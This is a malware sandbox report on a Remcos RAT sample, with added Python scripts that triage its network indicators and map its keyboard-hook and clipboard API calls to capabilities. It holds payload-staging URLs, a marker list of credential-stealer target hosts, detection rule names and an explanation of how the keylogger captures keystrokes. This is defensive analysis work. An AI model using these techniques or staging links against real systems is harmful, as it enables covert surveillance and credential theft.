Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2
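The string hits above mix four very different things, and triage depends on keeping them apart by where each string was carved from. The OCSP and CPS URIs (each with a stray byte such as `0C` carved after it) are the sample's Authenticode chain. Everything sourced from `bhv348F.tmp.27.dr` is, in Joe Sandbox naming, a file dropped by process 27, and its Office, MSN and login.live.com URLs are the sandbox host's own browser and telemetry cache rather than attacker infrastructure. The nirsoft.net, login.yahoo.com and accounts/servicelogin strings sit in the unpacked `wkrriuhD.pif` regions and mark bundled password-recovery tooling. The `*.sn.files.1drv.com` and `onedrive.live.com/download?resid=` links in `midyear_statement.exe` and `Dhuirrkw.PIF` are the loader's staging, and every TLS session in the report goes to the one peer 13.107.139.11:443. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses a constructed subset of nine lines copied from above (in the raw run-together export form; a ` | ` separator is also accepted), buckets hosts by those rules, counts TLS sessions per peer, and flags dumps whose fifth name field is 0x40. That this field is the region's page protection (PAGE_EXECUTE_READWRITE = 0x40), the category rules and the marker host list are this example's assumptions, not documented Joe Sandbox behaviour.

```python
"""Triage the Networking block of a Joe Sandbox report.

Added example, not part of the Joe Sandbox report or its tooling. It parses
'String found in binary or memory' and 'HTTPS traffic detected' lines, keys
each string on where it was carved from, and separates likely attacker
infrastructure from Authenticode/PKI and host-cache noise. The category
rules, the marker host list and the memory-dump field layout are this
example's assumptions, not documented Joe Sandbox behaviour.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed input: nine lines copied from the report (raw export, columns run together).
REPORT_LINES = """\
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv348F.tmp.27.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
Source: wkrriuhD.pifString found in binary or memory: https://login.yahoo.com/config/login
Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aborlw.sn.files.1drv.com/
Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
"""

STRING_RE = re.compile(r"^Source: (?P<src>.*?)\s*\|?\s*String found in binary or memory: (?P<url>\S+)$")
TLS_RE = re.compile(r"HTTPS traffic detected: (?P<peer>[\d.]+:\d+) -> [\d.]+:(?P<port>\d+) version: (?P<ver>TLS [\d.]+)")
# Assumed layout of a dump name: <process index>.<reason>.<id>.<base address>.<page protection>.<...>.sdmp
DUMP_RE = re.compile(r"^(?P<pidx>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\..*\.sdmp$")
PAGE_EXECUTE_READWRITE = 0x40  # Windows memory protection constant
# Hosts that NirSoft-style password recovery tools carry as targets (assumed marker set)
CRED_TOOL_HOSTS = {"www.nirsoft.net", "login.yahoo.com", "www.google.com",
                   "www.imvu.com", "www.ebuddy.com", "www.pmail.com"}


def parse_source(src):
    """Walk 'proc, dump, proc, dump, file.N.dr' tokens; a dump belongs to the process named before it."""
    info = {"in_memory": False, "dropped_by": set(), "rwx_regions": set()}
    current = None
    for tok in src.split(", "):
        m = re.fullmatch(r".+\.(?P<pid>\d+)\.dr", tok)
        if m:                                   # '<file>.N.dr': a file dropped by process N
            info["dropped_by"].add(int(m["pid"]))
            continue
        m = DUMP_RE.match(tok)
        if m is None:                           # bare process name
            current, info["in_memory"] = tok, True
            continue
        if int(m["prot"], 16) == PAGE_EXECUTE_READWRITE:
            info["rwx_regions"].add(f"{current}[{int(m['pidx'], 16)}]@{int(m['base'], 16):#x}")
    return info


def classify(url, source):
    """Order matters: PKI strings and tool markers first, then host-cache noise, then staging."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    if host.startswith("ocsp.") or parts.path.upper().startswith("/CPS"):
        return "pki_boilerplate"        # OCSP/CPS URIs carved from the Authenticode chain
    if host in CRED_TOOL_HOSTS:
        return "credential_tool_marker"
    if source["dropped_by"] and not source["in_memory"]:
        return "host_cache_noise"       # seen only in a temp file the stealer dropped: the host's own cache
    if host.endswith(".1drv.com") or host.endswith("live.com"):
        return "payload_staging"        # OneDrive share links the loader fetches
    return "other"


def strip_der_residue(url):
    """'http://ocsp.digicert.com0C' -> 'http://ocsp.digicert.com': the tail is the next DER byte carved with the URI."""
    return re.sub(r"0[^/]?$", "", url)


def triage(text):
    iocs, tls, rwx = defaultdict(set), Counter(), set()
    for line in text.splitlines():
        m = STRING_RE.match(line.strip())
        if m:
            src = parse_source(m["src"])
            cat = classify(m["url"], src)
            url = strip_der_residue(m["url"]) if cat == "pki_boilerplate" else m["url"]
            iocs[cat].add(urlsplit(url).netloc.lower())
            rwx |= src["rwx_regions"]
            continue
        m = TLS_RE.search(line)
        if m:
            tls[m["peer"]] += 1         # one report line per client port, so this counts sessions per peer
    return {"iocs": {k: sorted(v) for k, v in sorted(iocs.items())},
            "tls_peers": dict(tls), "rwx_regions": sorted(rwx)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(REPORT_LINES), indent=2))
```

Run over the full block above, the `payload_staging` bucket is the one worth blocking or hunting on (three `*.sn.files.1drv.com` hosts and three `resid=653A5056738F1A02%21262..264` download links), while `host_cache_noise` would otherwise contribute dozens of Microsoft CDN hosts to an IOC feed; the `rwx_regions` list gives the unpacked image at 0x400000 in process index 0x1D (29) to dump and examine first.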

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_1233A2B8 SetWindowsHookExA 0000000D,1233A2A4,00000000 | 24_2_1233A2B8
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard, | 24_2_1233B70E
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_123468C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 24_2_123468C1
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 27_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, | 27_2_0040987A
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 27_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, | 27_2_004098E2
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, | 28_2_00406DFC
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 28_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, | 28_2_00406E9F
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard, | 24_2_1233B70E
Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_1233A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, | 24_2_1233A3E0
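Read together, the chains above say more than "keylogger". The hook id 0000000D passed to SetWindowsHookExA is WH_KEYBOARD_LL (13), the hook procedure at 1233A2A4 lies in the same 0x1233xxxx region as the callers, and the report's "hook set: 0 keyboard low level" line shows the thread id was 0, i.e. a global hook. The GetForegroundWindow/GetKeyboardLayout/GetKeyboardState/ToUnicodeEx chain at 1233A3E0 is how a hook callback turns virtual-key codes into layout-correct characters and records which window received them. The clipboard writers in process indexes 27 and 28 use GlobalFix and GlobalUnWire, functions Windows keeps only for 16-bit compatibility, so they belong to a different code base (the bundled recovery tool exporting its results) than the 0x1233xxxx module that reads the clipboard. The Python below is an added example, not part of the report: it parses these Code function lines (copied verbatim in the raw export form; a ` | ` separator is also accepted), decodes the hook type from the first argument, and tags each process index with capability names and ATT&CK technique ids. The rule table, the technique mapping, and reading the three shown arguments as idHook, lpfn, hMod are this example's own assumptions.

```python
"""Map Joe Sandbox 'Code function' API chains to input-capture capabilities.

Added example, not part of the report. It parses lines such as
'<proc>_2_<addr> Api1,Api2,...,<proc>_2_<addr>' (and the variant that shows
call arguments), decodes the SetWindowsHookEx hook type from its first
argument, and tags each process index with what the chain can do. The rule
table, the ATT&CK mapping and the reading of the three shown arguments as
idHook, lpfn, hMod are this example's own assumptions.
"""
import re
from collections import defaultdict

# Constructed input: Code function lines from the report, as exported (columns run together).
CODE_LINES = r"""
Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233A2B8 SetWindowsHookExA 0000000D,1233A2A4,0000000024_2_1233A2B8
Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard,24_2_1233B70E
Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123468C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,24_2_123468C1
Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,27_2_0040987A
Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,28_2_00406DFC
Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,24_2_1233A3E0
"""

# '<pid>_2_<addr> <body>' followed by the same function id again (optionally after ' | ')
CODE_RE = re.compile(
    r"Code function: (?P<pid>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8}) (?P<body>.*?)"
    r"(?:\s*\|\s*)?(?:(?P=pid)_\d+_(?P=addr))?$")

# SetWindowsHookEx idHook values (Windows constants)
WH_HOOKS = {2: "WH_KEYBOARD", 3: "WH_GETMESSAGE", 5: "WH_CBT", 7: "WH_MOUSE",
            13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}
KEYBOARD_HOOKS = {"WH_KEYBOARD", "WH_KEYBOARD_LL"}
# (capability, APIs that must all appear in one chain, ATT&CK technique or None)
RULES = [
    ("clipboard_read", {"OpenClipboard", "GetClipboardData"}, "T1115"),
    ("clipboard_write", {"SetClipboardData"}, None),
    ("keystroke_translation", {"GetKeyboardState", "ToUnicodeEx"}, "T1056.001"),
    ("foreground_window_tracking", {"GetForegroundWindow", "GetWindowThreadProcessId"}, None),
    # GlobalFix/GlobalUnWire exist only for 16-bit compatibility: a different code base than 0x1233xxxx
    ("legacy_win16_memory_api", {"GlobalFix", "GlobalUnWire"}, None),
]


def parse_code_line(line):
    """Return {'pid', 'addr', 'apis', 'args'} for one Code function line, or None."""
    m = CODE_RE.search(line)
    if m is None:
        return None
    body = m["body"].strip()
    name, _, argstr = body.partition(" ")
    if argstr:                                  # 'Api hex,hex,hex': one call with its arguments
        apis, args = [name], [int(a, 16) for a in argstr.split(",") if a]
    else:                                       # 'Api,Api,Api,': the chain of calls in the function
        apis, args = [a for a in body.split(",") if a], []
    return {"pid": int(m["pid"]), "addr": int(m["addr"], 16), "apis": apis, "args": args}


def analyse(text):
    """Aggregate per process index: capability tags and ATT&CK techniques."""
    found = defaultdict(lambda: {"capabilities": set(), "techniques": set()})
    for line in text.splitlines():
        rec = parse_code_line(line)
        if rec is None:
            continue
        apis, entry = set(rec["apis"]), found[rec["pid"]]
        if apis & {"SetWindowsHookExA", "SetWindowsHookExW"} and rec["args"]:
            hook = WH_HOOKS.get(rec["args"][0], f"WH_{rec['args'][0]}")   # first shown arg assumed idHook
            entry["capabilities"].add(f"hook:{hook}")
            if hook in KEYBOARD_HOOKS:
                entry["techniques"].add("T1056.001")
        for cap, needed, technique in RULES:
            if needed <= apis:
                entry["capabilities"].add(cap)
                if technique:
                    entry["techniques"].add(technique)
    return {pid: {k: sorted(v) for k, v in e.items()} for pid, e in sorted(found.items())}


if __name__ == "__main__":
    for pid, entry in analyse(CODE_LINES).items():
        print(pid, entry)
```

Process index 24 comes out with the keyboard hook, keystroke translation, foreground-window tracking and both clipboard directions, which is the RAT's own input capture; 27 and 28 carry only clipboard writes plus the Win16-era memory calls, which is consistent with a separate tool placing its output on the clipboard rather than a second keylogger.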

E-Banking Fraud

Source: Yara match | File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234C9E2 SystemParametersInfoW,24_2_1234C9E2

                      System Summary

                      barindex
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
